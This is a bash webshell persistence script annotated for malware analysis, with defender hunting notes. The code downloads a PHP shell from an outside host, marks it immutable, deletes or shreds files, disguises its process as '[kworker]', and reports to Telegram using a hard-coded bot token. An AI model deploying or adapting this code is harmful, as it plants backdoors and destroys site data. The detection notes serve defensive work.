#!/bin/bash
# NOTE(review): malware sample -- a webshell "guard"/persistence script, annotated for
# analysis and detection only. Code tokens and every runtime string are unchanged from
# the page; only comments were added or translated to English.
#
# What the script is written to do (from the visible code):
#   * watch WEB_SHELL_DIR with inotifywait for modify/move/delete/attrib events;
#   * delete whatever file triggered the event (delete_intruder);
#   * inspect up to 10 processes matching "php" and delete a matched executable path;
#   * download a PHP file from BACKUP_SHELL into a randomly chosen existing directory
#     under /var/www/html, make it read-only and (as root) immutable;
#   * report each action to a Telegram chat through the Bot API;
#   * run the watcher under the process name "[kworker]".
#
# Hunting / detection notes for defenders:
#   * a userland process named "[kworker]" whose /proc/<pid>/exe resolves to bash;
#     genuine kernel worker threads normally have an empty cmdline and no exe target;
#   * inotifywait running recursively against a web root;
#   * outbound HTTPS from a web server to api.telegram.org and to the BACKUP_SHELL host;
#   * 8-character alphanumeric *.php files with mode 0400 under the web root, possibly
#     carrying the immutable attribute (visible with lsattr; needs chattr -i to remove);
#   * unexplained loss of files in the watched directory: every touched file is deleted.
#   Stop the watcher process before cleaning up files, since file events drive redeployment.

# Configuration
WEB_SHELL_DIR="/home/sekolahb/public_html/" # Main webshell directory (the watched path)
BACKUP_SHELL="https://raw.zeverix.com/raw/untitled-719" # Location of the backup shell (download URL; network IoC)
# Hard-coded Bot API credential and chat ID: treat both as exposed secrets and as IoCs.
TELEGRAM_BOT_TOKEN="7765041082:AAGhlbXBsa4qDiAKbVOSmtZ50Gw45-TcVK8" # Telegram bot token
TELEGRAM_CHAT_ID="1345261884" # Telegram chat ID

# Send a notification to Telegram.
# Arguments: $1 - message text
# Posts to the Bot API sendMessage endpoint; the request is capped at 3 seconds by
# `timeout`, and all curl output and errors are discarded.
send_telegram() {
  local message="$1"
  timeout 3 curl -s -X POST "https://api.telegram.org/bot$TELEGRAM_BOT_TOKEN/sendMessage" \
    -d "chat_id=$TELEGRAM_CHAT_ID" \
    -d "text=$message" > /dev/null 2>&1
}

# Redeploy the shell into a random directory that already exists.
# Outputs: the path of the newly written file on stdout.
deploy_shell() {
  # Get the list of existing directories directly under /var/www/html (excluding the
  # names html, cgi-bin, error and icons), shuffled by shuf; find errors are discarded.
  local existing_dirs=($(find /var/www/html -maxdepth 1 -type d ! -name "html" ! -name "cgi-bin" ! -name "error" ! -name "icons" 2>/dev/null | shuf))

  # Pick a random directory from the list (first entry of the shuffled list).
  local random_dir="${existing_dirs[0]}"

  # If no directory matched, fall back to the default directory.
  if [ -z "$random_dir" ]; then
    random_dir="/var/www/html"
  fi

  # Generate a random file name: 8 characters from [a-zA-Z0-9] plus ".php".
  local shell_name=$(tr -dc 'a-zA-Z0-9' < /dev/urandom | fold -w 8 | head -n 1).php
  local new_shell_path="$random_dir/$shell_name"

  # Download the shell from the URL; curl's exit status is not checked.
  curl -s -o "$new_shell_path" "$BACKUP_SHELL"
  # Owner read-only; when running as uid 0 the file is also marked immutable, so a
  # plain rm fails until the attribute is cleared.
  chmod 400 "$new_shell_path"
  if [ "$(id -u)" -eq 0 ]; then
    chattr +i "$new_shell_path" 2>/dev/null
  fi

  send_telegram "⚠️ SHELL DEPLOYED: $new_shell_path"
  echo "$new_shell_path"
}

# Delete a "dangerous" file (the author's term for any file touched in the watched path).
# Arguments: $1 - path to remove
# Uses rm -f first; if a regular file is still present, falls back to shred -fuz
# (force, overwrite, final zero pass, unlink). Impact: destroys forensic evidence and
# possibly legitimate site content.
delete_intruder() {
  local target="$1"
  rm -f "$target"
  if [ -f "$target" ]; then
    shred -fuz "$target" 2>/dev/null
  fi
}

# Detect and "delete back" a PHP attacker (the author's term for whoever removes the shell).
# Outputs: the deleted path on stdout, if one was selected and exists as a regular file.
detect_and_delete_php_attacker() {
  # First 10 PIDs whose full command line contains "php".
  local php_processes=$(pgrep -f "php" | head -10)
  local attacker_found=""

  for pid in $php_processes; do
    # php_file is the resolved /proc/<pid>/exe target, i.e. the process executable.
    local php_file=$(readlink -f /proc/$pid/exe 2>/dev/null)
    # cmdline with its NUL separators turned into spaces.
    local cmd=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')

    # Select the process when its command line mentions unlink, delete or "rm ".
    if [[ "$cmd" == *"unlink"* ]] || [[ "$cmd" == *"delete"* ]] || [[ "$cmd" == *"rm "* ]]; then
      attacker_found="$php_file"
      break
    fi

    # Or when the executable path contains the watched directory.
    if [[ "$php_file" == *"$WEB_SHELL_DIR"* ]]; then
      attacker_found="$php_file"
      break
    fi
  done

  # NOTE(review): what is removed here is the executable path captured above; a missing
  # PHP binary on an affected host may be a side effect of this step.
  if [ -n "$attacker_found" ] && [ -f "$attacker_found" ]; then
    delete_intruder "$attacker_found"
    send_telegram "🔥 PHP ATTACKER DELETED! File: $attacker_found"
    echo "$attacker_found"
  fi
}

# Main loop with process-name disguise: `exec -a "[kworker]"` sets argv[0] of the child
# bash so that it resembles a kernel worker thread in process listings; the trailing `&`
# backgrounds it.
# The single-quoted text passed to bash -c is reproduced exactly as it appears on the
# page, collapsed onto one line; its original line breaks are not recoverable from here,
# so it is left untouched. As written it refers to mkdir -p on WEB_SHELL_DIR, a recursive
# inotifywait monitor on that path (events modify, move, delete, attrib), a read loop that
# skips directories, and calls to delete_intruder, detect_and_delete_php_attacker,
# deploy_shell and send_telegram.
exec -a "[kworker]" bash -c ' # Buat direktori target jika belum ada mkdir -p "$WEB_SHELL_DIR" # Monitor direktori inotifywait -m -r -e modify,move,delete,attrib "$WEB_SHELL_DIR" --format "%w%f %e" 2>/dev/null | while read file event do [[ -d "$file" ]] && continue # Hapus file yang diotak-atik delete_intruder "$file" # Deteksi dan hapus balik PHP attacker attacker_file=$(detect_and_delete_php_attacker) # Deploy shell baru di direktori acak yang sudah ada new_shell=$(deploy_shell) # Kirim notifikasi lengkap if [ -n "$attacker_file" ]; then send_telegram "🚨 PHP ATTACKER DETECTED & DELETED! File: $file Event: $event Attacker: $attacker_file New Shell: $new_shell ✅Mendeteksi file PHP yang dipakai untuk menghapus. ✅Menghapus balik file PHP tersebut secara otomatis. ✅Mengirim notifikasi ke bot Telegram Anda dengan detail ancamannya. Prinsipnya simpel: Siapa berani hapus, langsung hilang duluan!🖕" else send_telegram "🚨 ALERT! File: $file | Event: $event | New Shell: $new_shell" fi done ' &